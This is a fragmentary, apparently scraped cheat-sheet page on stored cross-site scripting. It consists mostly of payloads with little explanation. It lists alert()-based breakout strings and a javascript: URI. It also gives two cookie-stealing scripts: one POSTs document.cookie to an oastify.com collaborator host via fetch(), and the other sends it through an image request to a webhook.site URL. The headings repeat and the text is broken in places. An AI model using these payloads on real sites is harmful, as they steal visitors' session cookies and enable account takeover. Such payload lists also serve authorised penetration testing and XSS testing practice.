Stored
Stored Server XSS

comment field for HTML injection.

Stored Client XSS


href Attribute


Contact Form



Last updated

comment field for HTML injection.








Last updated
// JaveScript payloads used to escape
"><script>alert()</script>
"><img src=x onerror=alert()>// JaveScript payloads used
javascript:alert()// collaborator payload
<script>
fetch('https://705jjd45qk9l1pb4rhns097xgomfa5yu.oastify.com',
{
method: 'POST',
mode: 'no-cors',
body:document.cookie
});
</script>
// webhook payload
<script>var i = new Image; i.src="https://webhook.site/094ef770-e736-4b31-a3cb-34be690ff1b9/?"+document.cookie</script>